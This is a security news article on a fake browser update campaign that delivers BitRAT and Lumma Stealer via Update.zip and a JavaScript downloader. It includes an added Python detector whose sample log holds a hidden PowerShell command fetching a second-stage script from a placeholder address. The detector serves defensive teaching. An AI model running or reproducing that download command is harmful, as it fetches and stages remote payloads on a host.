CyberSecurity SEE

Be wary of false browser updates

eSentire’s Threat Response Unit (TRU) recently uncovered a malware campaign that uses fake browser update prompts to distribute two malware families: BitRAT and Lumma Stealer. Because the lure is served from ordinary web pages carrying injected JavaScript, the campaign can reach a large number of users.

The operators rely on social engineering rather than a browser exploit: a counterfeit update prompt persuades the user to download and run a malicious file, and in doing so the user compromises their own device and data. eSentire’s TRU observed one instance of this lure delivering BitRAT and Lumma Stealer, which illustrates how widely the technique is used among cybercriminals.

The infection chain begins when a user visits a web page into which malicious JavaScript has been injected. The script redirects the user to a fake update page that prompts them to download a ZIP archive named ‘Update.zip’. The archive is hosted on Discord’s content delivery network (CDN) and contains a JavaScript file, Update.js, which, once the victim runs it, acts as the initial downloader for the remaining payloads.

The PowerShell scripts that this downloader retrieves fetch and execute the next-stage loader and the payloads from a known BitRAT command-and-control (C2) address. The attack involves several files, each with its own role, including loaders for the malware payloads and mechanisms that keep them persistent on the host.
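The chain above has three observable stages on an endpoint: an archive fetched from Discord’s CDN, a Windows script host (wscript.exe or cscript.exe, the default handler for a double-clicked .js file) running a script out of a user-writable folder, and PowerShell spawned by that script host. The following Python script is an added example, not code from the article or from eSentire’s TRU: it replays those stages against a few constructed log lines in a simplified key=value format (the format, hostnames, paths, PIDs and the 203.0.113.10 address are assumptions for the example) and only escalates to an alert when at least two stages fire, since a lone .zip download from Discord is common and benign on its own.

```python
"""Toy detector for the fake-update -> Update.js -> PowerShell chain.

Added example, not eSentire's or the article's code. Event schema,
hostnames, paths, PIDs and the 203.0.113.10 address are assumptions.
"""
from __future__ import annotations

import re
from typing import Iterable

# Constructed sample telemetry: one proxy line and three process-creation
# events in an assumed 'key=value key2="value with spaces"' format.
SAMPLE_EVENTS = [
    r'type=proxy user=alice host=cdn.discordapp.com uri=/attachments/111/222/Update.zip status=200',
    r'type=process pid=4100 ppid=800 parent=explorer.exe image=C:\Windows\System32\wscript.exe '
    r'cmdline="wscript.exe C:\Users\alice\Downloads\Update\Update.js"',
    r'type=process pid=4120 ppid=4100 parent=wscript.exe '
    r'image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'cmdline="powershell.exe -nop -w hidden -ep bypass -c iwr http://203.0.113.10/stage2.ps1 -OutFile $env:TEMP\s.ps1"',
    r'type=process pid=5000 ppid=800 parent=explorer.exe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"',
]

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
ARCHIVE_EXT = ('.zip', '.rar', '.7z', '.iso')
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}
POWERSHELL = {'powershell.exe', 'pwsh.exe'}
# Locations an unprivileged user can write to and run from.
USER_WRITABLE = re.compile(r'\\Users\\[^\\]+\\(?:Downloads|AppData)\\|\\Temp\\', re.I)
SCRIPT_EXT = re.compile(r'\.(?:js|jse|vbs|vbe|wsf|hta)\b', re.I)


def parse_event(line: str) -> dict:
    """Turn 'k=v k2="v with spaces"' into a dict with quotes stripped."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in KV_RE.finditer(line)}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def rule_archive_from_discord_cdn(ev: dict) -> bool:
    """Stage 1: an archive (e.g. Update.zip) served from Discord's CDN."""
    host = ev.get('host', '').lower()
    return (ev.get('type') == 'proxy'
            and (host.endswith('discordapp.com') or host.endswith('discord.com'))
            and ev.get('uri', '').lower().endswith(ARCHIVE_EXT))


def rule_script_host_from_user_dir(ev: dict) -> bool:
    """Stage 2: wscript/cscript executing a script out of a user-writable path."""
    cmd = ev.get('cmdline', '')
    return (ev.get('type') == 'process'
            and basename(ev.get('image', '')) in SCRIPT_HOSTS
            and SCRIPT_EXT.search(cmd) is not None
            and USER_WRITABLE.search(cmd) is not None)


def rule_powershell_from_script_host(ev: dict) -> bool:
    """Stage 3: PowerShell spawned by the script host (the downloader step)."""
    return (ev.get('type') == 'process'
            and basename(ev.get('image', '')) in POWERSHELL
            and basename(ev.get('parent', '')) in SCRIPT_HOSTS)


RULES = {
    'archive_from_discord_cdn': rule_archive_from_discord_cdn,
    'script_host_from_user_dir': rule_script_host_from_user_dir,
    'powershell_from_script_host': rule_powershell_from_script_host,
}


def detect(lines: Iterable[str]) -> list[tuple[str, dict]]:
    """Return (rule_name, event) for every event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev))
    return hits


def chain_verdict(lines: Iterable[str]) -> str:
    """Escalate only when two or more distinct stages of the chain fire."""
    stages = {name for name, _ in detect(list(lines))}
    if len(stages) >= 2:
        return 'ALERT: fake-update chain (%s)' % ', '.join(sorted(stages))
    if stages:
        return 'SUSPICIOUS: ' + next(iter(stages))
    return 'CLEAN'


if __name__ == '__main__':
    for name, ev in detect(SAMPLE_EVENTS):
        print(f'[{name}] {ev.get("cmdline") or ev.get("uri")}')
    print(chain_verdict(SAMPLE_EVENTS))
```

The rules are deliberately keyed on behaviour (script host from a download folder, PowerShell whose parent is a script host) rather than on the file name Update.zip or a particular C2 address, so they still fire when the operators swap the payload or the hosting, which the report notes they can do freely.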

BitRAT, the first of the two payloads, is a feature-rich remote access trojan. Its capabilities include several connection modes, a UAC bypass for obtaining elevated privileges, process protection, cryptocurrency mining, and remote desktop access, among others. The sample analyzed was UPX-packed and carried an encrypted configuration that must be decrypted with a specific key before it can be read.

Lumma Stealer, the second payload, is an information stealer written in C. It targets cryptocurrency wallets, browser extensions used for two-factor authentication (2FA), and other sensitive data on the victim’s machine, and exfiltrates what it collects to a command-and-control (C2) server over HTTP POST requests.

Delivering these payloads through fake updates shows how the operators abuse trusted names, the browser’s own update prompt and Discord’s CDN, to maximize the reach and impact of their attacks. Because the payload is interchangeable, the same fake-update delivery mechanism can be expected to reappear carrying other malware families.

Overall, the campaign underscores the importance of user vigilance and security awareness: a legitimate browser never delivers its update as a ZIP archive or a JavaScript file from a third-party download link. As cybercriminals continue to refine their lures, individuals and organizations should stay informed and take proactive measures, such as alerting on script hosts (wscript.exe, cscript.exe) that run .js files from user download folders and on PowerShell launched by those script hosts, to safeguard their systems and data.
